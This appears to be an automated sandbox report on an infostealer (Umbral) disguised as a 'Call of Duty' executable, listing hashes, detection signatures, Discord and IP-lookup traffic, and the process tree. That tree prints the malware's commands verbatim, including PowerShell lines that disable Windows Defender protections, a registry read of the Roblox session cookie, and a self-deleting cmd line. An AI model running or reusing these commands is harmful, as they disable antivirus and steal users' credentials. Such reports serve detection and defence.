Analysis
-
max time kernel
125s -
max time network
140s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
13-01-2025 13:19
General
-
Target
black ops 6/Call of Duty.exe
-
Size
232KB
-
MD5
6b61cf8c88fadac330d0f9e6250c7c78
-
SHA1
7811fe5dc09a3677df1ab475408612d3058af724
-
SHA256
2a13f0c0d799ce333dc553122f96285d3ad57eb9671e860884c605362722c03f
-
SHA512
d3efe5f1d0bbcaa324934135a8da8348cd213ab4ceb7d87c3584979895bf895ed60910ce92f7d19efa6ceee22891da0dbe5596b1eafcf8f932d7a3c3f95928bd
-
SSDEEP
6144:xloZM+rIkd8g+EtXHkv/iD4urp7KInDAXZMK7bCLob8e1m9Oi:DoZtL+EP8urp7KInDAXZMK7bCs+j
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/1432-1-0x000001D539B10000-0x000001D539B50000-memory.dmp family_umbral -
Umbral family
-
pid Process 2988 powershell.exe 2356 powershell.exe 3708 powershell.exe 1468 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Call of Duty.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 28 discord.com 27 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2684 cmd.exe 1456 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4664 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1456 PING.EXE -
Suspicious behavior: EnumeratesProcesses 35 IoCs
pid Process 2736 wmic.exe 2736 wmic.exe 2736 wmic.exe 2736 wmic.exe 1432 Call of Duty.exe 1468 powershell.exe 1468 powershell.exe 2988 powershell.exe 2988 powershell.exe 2988 powershell.exe 2356 powershell.exe 2356 powershell.exe 2356 powershell.exe 2804 powershell.exe 2804 powershell.exe 2804 powershell.exe 4044 wmic.exe 4044 wmic.exe 4044 wmic.exe 4044 wmic.exe 2776 wmic.exe 2776 wmic.exe 2776 wmic.exe 2776 wmic.exe 1500 wmic.exe 1500 wmic.exe 1500 wmic.exe 1500 wmic.exe 3708 powershell.exe 3708 powershell.exe 3708 powershell.exe 4664 wmic.exe 4664 wmic.exe 4664 wmic.exe 4664 wmic.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1432 Call of Duty.exe Token: SeIncreaseQuotaPrivilege 2736 wmic.exe Token: SeSecurityPrivilege 2736 wmic.exe Token: SeTakeOwnershipPrivilege 2736 wmic.exe Token: SeLoadDriverPrivilege 2736 wmic.exe Token: SeSystemProfilePrivilege 2736 wmic.exe Token: SeSystemtimePrivilege 2736 wmic.exe Token: SeProfSingleProcessPrivilege 2736 wmic.exe Token: SeIncBasePriorityPrivilege 2736 wmic.exe Token: SeCreatePagefilePrivilege 2736 wmic.exe Token: SeBackupPrivilege 2736 wmic.exe Token: SeRestorePrivilege 2736 wmic.exe Token: SeShutdownPrivilege 2736 wmic.exe Token: SeDebugPrivilege 2736 wmic.exe Token: SeSystemEnvironmentPrivilege 2736 wmic.exe Token: SeRemoteShutdownPrivilege 2736 wmic.exe Token: SeUndockPrivilege 2736 wmic.exe Token: SeManageVolumePrivilege 2736 wmic.exe Token: 33 2736 wmic.exe Token: 34 2736 wmic.exe Token: 35 2736 wmic.exe Token: 36 2736 wmic.exe Token: SeIncreaseQuotaPrivilege 2736 wmic.exe Token: SeSecurityPrivilege 2736 wmic.exe Token: SeTakeOwnershipPrivilege 2736 wmic.exe Token: SeLoadDriverPrivilege 2736 wmic.exe Token: SeSystemProfilePrivilege 2736 wmic.exe Token: SeSystemtimePrivilege 2736 wmic.exe Token: SeProfSingleProcessPrivilege 2736 wmic.exe Token: SeIncBasePriorityPrivilege 2736 wmic.exe Token: SeCreatePagefilePrivilege 2736 wmic.exe Token: SeBackupPrivilege 2736 wmic.exe Token: SeRestorePrivilege 2736 wmic.exe Token: SeShutdownPrivilege 2736 wmic.exe Token: SeDebugPrivilege 2736 wmic.exe Token: SeSystemEnvironmentPrivilege 2736 wmic.exe Token: SeRemoteShutdownPrivilege 2736 wmic.exe Token: SeUndockPrivilege 2736 wmic.exe Token: SeManageVolumePrivilege 2736 wmic.exe Token: 33 2736 wmic.exe Token: 34 2736 wmic.exe Token: 35 2736 wmic.exe Token: 36 2736 wmic.exe Token: SeDebugPrivilege 1468 powershell.exe Token: SeIncreaseQuotaPrivilege 1468 powershell.exe Token: SeSecurityPrivilege 1468 powershell.exe Token: SeTakeOwnershipPrivilege 1468 powershell.exe Token: SeLoadDriverPrivilege 1468 powershell.exe Token: SeSystemProfilePrivilege 1468 powershell.exe Token: SeSystemtimePrivilege 1468 powershell.exe Token: SeProfSingleProcessPrivilege 1468 powershell.exe Token: SeIncBasePriorityPrivilege 1468 powershell.exe Token: SeCreatePagefilePrivilege 1468 powershell.exe Token: SeBackupPrivilege 1468 powershell.exe Token: SeRestorePrivilege 1468 powershell.exe Token: SeShutdownPrivilege 1468 powershell.exe Token: SeDebugPrivilege 1468 powershell.exe Token: SeSystemEnvironmentPrivilege 1468 powershell.exe Token: SeRemoteShutdownPrivilege 1468 powershell.exe Token: SeUndockPrivilege 1468 powershell.exe Token: SeManageVolumePrivilege 1468 powershell.exe Token: 33 1468 powershell.exe Token: 34 1468 powershell.exe Token: 35 1468 powershell.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 1432 wrote to memory of 2736 1432 Call of Duty.exe 92 PID 1432 wrote to memory of 2736 1432 Call of Duty.exe 92 PID 1432 wrote to memory of 1500 1432 Call of Duty.exe 95 PID 1432 wrote to memory of 1500 1432 Call of Duty.exe 95 PID 1432 wrote to memory of 1468 1432 Call of Duty.exe 97 PID 1432 wrote to memory of 1468 1432 Call of Duty.exe 97 PID 1432 wrote to memory of 2988 1432 Call of Duty.exe 100 PID 1432 wrote to memory of 2988 1432 Call of Duty.exe 100 PID 1432 wrote to memory of 2356 1432 Call of Duty.exe 102 PID 1432 wrote to memory of 2356 1432 Call of Duty.exe 102 PID 1432 wrote to memory of 2804 1432 Call of Duty.exe 104 PID 1432 wrote to memory of 2804 1432 Call of Duty.exe 104 PID 1432 wrote to memory of 4044 1432 Call of Duty.exe 109 PID 1432 wrote to memory of 4044 1432 Call of Duty.exe 109 PID 1432 wrote to memory of 2776 1432 Call of Duty.exe 112 PID 1432 wrote to memory of 2776 1432 Call of Duty.exe 112 PID 1432 wrote to memory of 1500 1432 Call of Duty.exe 114 PID 1432 wrote to memory of 1500 1432 Call of Duty.exe 114 PID 1432 wrote to memory of 3708 1432 Call of Duty.exe 116 PID 1432 wrote to memory of 3708 1432 Call of Duty.exe 116 PID 1432 wrote to memory of 4664 1432 Call of Duty.exe 118 PID 1432 wrote to memory of 4664 1432 Call of Duty.exe 118 PID 1432 wrote to memory of 2684 1432 Call of Duty.exe 120 PID 1432 wrote to memory of 2684 1432 Call of Duty.exe 120 PID 2684 wrote to memory of 1456 2684 cmd.exe 122 PID 2684 wrote to memory of 1456 2684 cmd.exe 122 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1500 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\black ops 6\Call of Duty.exe"C:\Users\Admin\AppData\Local\Temp\black ops 6\Call of Duty.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\black ops 6\Call of Duty.exe"2⤵
- Views/modifies file attributes
PID:1500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\black ops 6\Call of Duty.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2356
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2804
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4044
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2776
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3708
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:4664
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\black ops 6\Call of Duty.exe" && pause2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1456
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations=is-enterprise-managed=no --field-trial-handle=3932,i,4538255413480930743,12957764444767653848,262144 --variations-seed-version --mojo-platform-channel-handle=3988 /prefetch:81⤵PID:4588
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3176
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations=is-enterprise-managed=no --field-trial-handle=2600,i,4538255413480930743,12957764444767653848,262144 --variations-seed-version --mojo-platform-channel-handle=3912 /prefetch:81⤵PID:4932
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD56a807b1c91ac66f33f88a787d64904c1
SHA183c554c7de04a8115c9005709e5cd01fca82c5d3
SHA256155314c1c86d8d4e5b802f1eef603c5dd4a2f7c949f069a38af5ba4959bd8256
SHA51229f2d9f30fc081e7fe6e9fb772c810c9be0422afdc6aff5a286f49a990ededebcf0d083798c2d9f41ad8434393c6d0f5fa6df31226d9c3511ba2a41eb4a65200
-
Filesize
948B
MD50ff8cd10414b63bed304d3f79442ec1f
SHA10295db6370938c4514c2e02f5c2b845deef28001
SHA25695a82232aa10ca009386207d4fa126f5ba6127b75c6360e390b269775d3c0e5e
SHA5124e618360300adebfe778231cac8e0ef68f60c23f29e861f59a24df640ce482a7325595a454b4b913ac325aa4cee497a4a848097afb84cca068e610080fb45e1b
-
Filesize
1KB
MD58e1fdd1b66d2fee9f6a052524d4ddca5
SHA10a9d0994559d1be2eecd8b0d6960540ca627bdb6
SHA2564cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13
SHA5125a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3
-
Filesize
1KB
MD5b3abf9c119b1e2a469d6ae5f0e7ab71b
SHA18721c63601b1873f76a4340dfcd3a47838bb8121
SHA2565139fa97b9dc9c7d3b495f1e3af4a0d6d63351a7e3d5fc6e882b6a97e82015d7
SHA5128c2884502ce833054894949c185304f7ebebd00cafe2112f9eee11eefdb1f8271aef9169fdd27204ce4eed4f8aaa28db44f5da524bca2494b1b22c1eeab20670
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82